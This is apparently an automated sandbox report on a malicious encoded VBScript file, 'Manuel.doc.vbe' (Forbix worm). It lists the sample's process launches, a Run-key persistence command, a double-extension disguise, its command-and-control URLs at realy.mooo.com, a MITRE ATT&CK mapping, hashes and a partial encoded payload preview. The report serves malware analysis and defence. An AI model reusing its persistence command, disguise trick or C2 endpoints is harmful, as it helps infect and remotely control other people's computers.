Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Manuel.doc.vbeVirustotal: Detection: 75%
Source: Manuel.doc.vbeMetadefender: Detection: 55%
Source: Manuel.doc.vbeReversingLabs: Detection: 74%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Manuel.doc.vbe'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WINDOWS\system32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WINDOWS\system32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.dbJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.dbJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.dbJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.dbJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Binary string: wshom.pdb source: wscript.exe, 00000004.00000002.3148533955.0000000001F70000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148046580.0000000000370000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148147651.0000000000470000.00000002.00000001.sdmp

Boot Survival:

barindex
Creates an autostart registry key pointing to binary in C:\WindowsShow sources
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysinfY2XJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysinfY2XJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysinfY2XJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Uses an obfuscated file name to hide its real file extension (double extension)Show sources
Source: Possible double extension: doc.vbeStatic PE information: Manuel.doc.vbe
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 2420Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 2420Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 2328Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 960Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 660Thread sleep time: -600000s >= -30000sJump to behavior
Source: wscript.exe, 00000000.00000002.2070037453.0000000004040000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeDomain query: realy.mooo.com
Source: C:\Windows\System32\wscript.exeNetwork Connect: 127.0.0.2 80Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.dbJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.dbJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.dbJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.dbJump to behavior
Source: wscript.exe, 00000004.00000002.3148247237.0000000000800000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148181873.0000000000850000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148189576.0000000000860000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: wscript.exe, 00000004.00000002.3148247237.0000000000800000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148181873.0000000000850000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148189576.0000000000860000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: wscript.exe, 00000004.00000002.3148247237.0000000000800000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148181873.0000000000850000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148189576.0000000000860000.00000002.00000001.sdmpBinary or memory string: !Progman
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1Registry Run Keys / Startup Folder11Process Injection112Masquerading2OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting21Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting21NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Manuel.doc.vbe75%VirustotalBrowse
Manuel.doc.vbe56%MetadefenderBrowse
Manuel.doc.vbe74%ReversingLabsScript-WScript.Worm.Forbix
Manuel.doc.vbe100%AviraVBS/Forbix.A

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
realy.mooo.com
127.0.0.2
truefalse
    		high

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://realy.mooo.com/(wscript.exe, 00000007.00000002.3148075473.000000000043E000.00000004.00000020.sdmpfalse
      		high
      http://realy.mooo.com/bot/lancer/index.php?cmd=pingAdvawscript.exe, 00000007.00000002.3148114769.00000000004C7000.00000004.00000020.sdmp, wscript.exe, 0000000A.00000002.3148939482.0000000003E90000.00000004.00000001.sdmpfalse
        		high
        http://www.%s.comPAwscript.exe, 00000000.00000002.2070144321.0000000005120000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.3149096479.00000000051E0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3149114904.0000000005280000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3149109885.0000000005410000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		low
        http://realy.mooo.com/bot/lancer/index.php?cmd=pingwscript.exe, 00000004.00000002.3148976708.000000000490E000.00000004.00000001.sdmp, wscript.exe, 00000004.00000002.3148136888.000000000041E000.00000004.00000020.sdmp, wscript.exe, 00000007.00000002.3148926880.000000000393A000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.3148114769.00000000004C7000.00000004.00000020.sdmp, wscript.exe, 0000000A.00000002.3148963520.0000000003EB6000.00000004.00000001.sdmpfalse
          		high
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.wscript.exe, 00000000.00000002.2070144321.0000000005120000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.3149096479.00000000051E0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3149114904.0000000005280000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3149109885.0000000005410000.00000002.00000001.sdmpfalse
            		high
            http://realy.mooo.comwscript.exe, 00000000.00000003.2068250667.00000000003EC000.00000004.00000001.sdmpfalse
              		high
              http://realy.mooo.com/bot/lancer/index.php?cmd=pingAdvaX%Lwscript.exe, 00000004.00000002.3148203777.00000000004A6000.00000004.00000020.sdmpfalse
                		high
                http://servername/isapibackend.dllwscript.exe, 00000000.00000002.2068750916.0000000001CE0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.3148277604.0000000001C00000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148226103.0000000001C50000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148231089.0000000001C60000.00000002.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		low
                http://realy.mooo.com/wscript.exe, 00000000.00000003.2068250667.00000000003EC000.00000004.00000001.sdmp, wscript.exe, 00000004.00000002.3148136888.000000000041E000.00000004.00000020.sdmp, wscript.exe, 0000000A.00000002.3148055856.00000000002AE000.00000004.00000020.sdmpfalse
                  		high
                  http://realy.mooo.com/bowscript.exe, 0000000A.00000002.3148055856.00000000002AE000.00000004.00000020.sdmpfalse
                    		high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious

                    Private

                    IP
                    127.0.0.2

                    General Information

                    Joe Sandbox Version:31.0.0 Emerald
                    Analysis ID:369332
                    Start date:16.03.2021
                    Start time:14:10:08
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 11m 56s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:Manuel.doc.vbe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal80.evad.winVBE@11/1@63/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .vbe
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    14:10:31API Interceptor12129x Sleep call for process: wscript.exe modified
                    14:10:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysinfY2X C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%\SysinfY2X.db
                    14:10:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysinfY2X C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%\SysinfY2X.db

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\SysinfY2X.db
                    Process:C:\Windows\System32\wscript.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):11195
                    Entropy (8bit):5.922750432207415
                    Encrypted:false
                    SSDEEP:192:YoVivS9W9c1+YqNAmzCFFVCcVXowajgUWPeks8B4+0gXoOAcwLP3OUy8y40DXKl8:YK1U9tYHmzCFucVXdOgXPekXBD0wodcP
                    MD5:CC2DB35F43B4A12700C431811A463439
                    SHA1:D838AAF8D656B7D8D0F48D13646E677EAAD35F20
                    SHA-256:FE9C78249937D57AAED2792238CAEEA298E715D9CF261ADD1FBFBAEEAB084D40
                    SHA-512:F5F9DCDEC48624819ECF24CD561C884C4F8496F6A8E766658F3C16D4DCAB342B0043D1BB543C320F5FEC44F5720B4FF642939A1C77CC849FDBE78F715FA0DDDE
                    Malicious:true
                    Reputation:low
                    Preview: #@~^oisAAA==v@!mG9+9P4HP~sc1|d!1|@*v@#@&r.~2MDWM~]+kEs+~1naDP@#@&Gr:,tGdD@#@&4GkY~',EM+C^Xc:WKWc^WsJ@#@&Gkh~4W/Dm/1DkaO@#@&4WkYm/^.bwOP{~J(WO&^lx^nMzrx9nXR24wr@#@&Gks~l1Yr\|xCh.@#@&m^Yb\{.Ch+,',JjXdr.0e o N(J@#@&Gk:~2m/dk7m.lh.@#@&wlk/b-{.lh+,'~Etlx!nVcNW1E@#@&GksPdVnna{Oksn@#@&/sn.w{Ors+~',+Z!T@#@&Gk:,/^n+a{Oks+msb:kD@#@&kV+.2mYb:.{skhrDPxP+T!Z!@#@&Gk:~4DY2@#@&j.Y~4YDwP{P;.+mYnr(Ln^D`Jtj(tS cjnD7+M(\SuP:nE#@#@&fb:~d4@#@&jnDPdt,x,.j1DbwYcZMnlD+64N+^OvJ.U^DbwYcj4+^Vr#@#@&9rsPW/@#@&?.Y~Wk'P/..lO+}8N+^D`r?mMkaOk.o sbVnjH/Y.hr(L+1OE#@#@&GkhP.\&?nD7rm.@#@&j.YP.\&?nD7r1+~{PV+Y}4NnmD`EhbxhLsY/=`ksw+MdGxmYbWUSn-.Vxks2+M/GUmY+NZ'- -MGKYw1ks\ r#@#@&ZKxdY,l[PHw+~rxmDX,x~F@#@&;WU/O~mNPXanK.6O~{P @#@&;WU/D~mNjm\.ZD.lDnr7+..MkOn,'Py@#@&;WxkO~l9?m\nZ.nmYn1KO2XkdO,'Pq@#@&fr:,dDDnm:|/+^0@#@&?.Y~/DDnCs{/.s0,'P;.nlD+}4%+^OvJ)NK[4c?O..l:Eb@#@&9ks~km.bwD{xm:.@#@&km.kaYmUm:+,xPq/mMr2Yc?1DrwOHm:n@#@&9ksPOha{Nr.@#@&O:am9k.,',/tc2X2l.N3x7k.G.:+.O?DDk.Ld`r]D+hwYE*P'PrwJ@#@&4GkYPx~rtOYalJzE,[,tWkY,'PrzE@#@&/O..l

                    Static File Info

                    General

                    File type:data
                    Entropy (8bit):5.922750432207415
                    TrID:
                      File name:Manuel.doc.vbe
                      File size:11195
                      MD5:cc2db35f43b4a12700c431811a463439
                      SHA1:d838aaf8d656b7d8d0f48d13646e677eaad35f20
                      SHA256:fe9c78249937d57aaed2792238caeea298e715d9cf261add1fbfbaeeab084d40
                      SHA512:f5f9dcdec48624819ecf24cd561c884c4f8496f6a8e766658f3c16d4dcab342b0043d1bb543c320f5fec44f5720b4ff642939a1c77cc849fdbe78f715fa0ddde
                      SSDEEP:192:YoVivS9W9c1+YqNAmzCFFVCcVXowajgUWPeks8B4+0gXoOAcwLP3OUy8y40DXKl8:YK1U9tYHmzCFucVXdOgXPekXBD0wodcP
                      File Content Preview:#@~^oisAAA==v@!mG9+9P4HP~sc1|d!1|@*v@#@&r.~2MDWM~]+kEs+~1naDP@#@&Gr:,tGdD@#@&4GkY~',EM+C^Xc:WKWc^WsJ@#@&Gkh~4W/Dm/1DkaO@#@&4WkYm/^.bwOP{~J(WO&^lx^nMzrx9nXR24wr@#@&Gks~l1Yr\|xCh.@#@&m^Yb\{.Ch+,',JjXdr.0e o N(J@#@&Gk:~2m/dk7m.lh.@#@&wlk/b-{.lh+,'~Etlx!nVcNW

                      File Icon

                      Icon Hash:e8d69ece869a9ec4

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      03/16/21-14:17:03.038121ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                      Network Port Distribution

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Mar 16, 2021 14:11:25.345366001 CET5219753192.168.2.228.8.8.8
                      Mar 16, 2021 14:11:25.539060116 CET53521978.8.8.8192.168.2.22
                      Mar 16, 2021 14:11:25.558363914 CET5309953192.168.2.228.8.8.8
                      Mar 16, 2021 14:11:25.615609884 CET53530998.8.8.8192.168.2.22
                      Mar 16, 2021 14:11:33.597986937 CET5283853192.168.2.228.8.8.8
                      Mar 16, 2021 14:11:33.647744894 CET53528388.8.8.8192.168.2.22
                      Mar 16, 2021 14:11:33.663414955 CET6120053192.168.2.228.8.8.8
                      Mar 16, 2021 14:11:33.712110043 CET53612008.8.8.8192.168.2.22
                      Mar 16, 2021 14:11:41.739949942 CET4954853192.168.2.228.8.8.8
                      Mar 16, 2021 14:11:41.799628973 CET53495488.8.8.8192.168.2.22
                      Mar 16, 2021 14:11:41.814532995 CET5562753192.168.2.228.8.8.8
                      Mar 16, 2021 14:11:41.980848074 CET53556278.8.8.8192.168.2.22
                      Mar 16, 2021 14:12:29.279630899 CET5600953192.168.2.228.8.8.8
                      Mar 16, 2021 14:12:29.339890003 CET53560098.8.8.8192.168.2.22
                      Mar 16, 2021 14:12:29.375546932 CET6186553192.168.2.228.8.8.8
                      Mar 16, 2021 14:12:29.553565025 CET53618658.8.8.8192.168.2.22
                      Mar 16, 2021 14:12:37.574986935 CET5517153192.168.2.228.8.8.8
                      Mar 16, 2021 14:12:37.632074118 CET53551718.8.8.8192.168.2.22
                      Mar 16, 2021 14:12:37.632877111 CET5517153192.168.2.228.8.8.8
                      Mar 16, 2021 14:12:37.690121889 CET53551718.8.8.8192.168.2.22
                      Mar 16, 2021 14:12:37.736078024 CET5249653192.168.2.228.8.8.8
                      Mar 16, 2021 14:12:37.796623945 CET53524968.8.8.8192.168.2.22
                      Mar 16, 2021 14:12:45.731780052 CET5756453192.168.2.228.8.8.8
                      Mar 16, 2021 14:12:45.794179916 CET53575648.8.8.8192.168.2.22
                      Mar 16, 2021 14:12:45.794931889 CET5756453192.168.2.228.8.8.8
                      Mar 16, 2021 14:12:45.854865074 CET53575648.8.8.8192.168.2.22
                      Mar 16, 2021 14:12:45.902149916 CET6300953192.168.2.228.8.8.8
                      Mar 16, 2021 14:12:45.959362030 CET53630098.8.8.8192.168.2.22
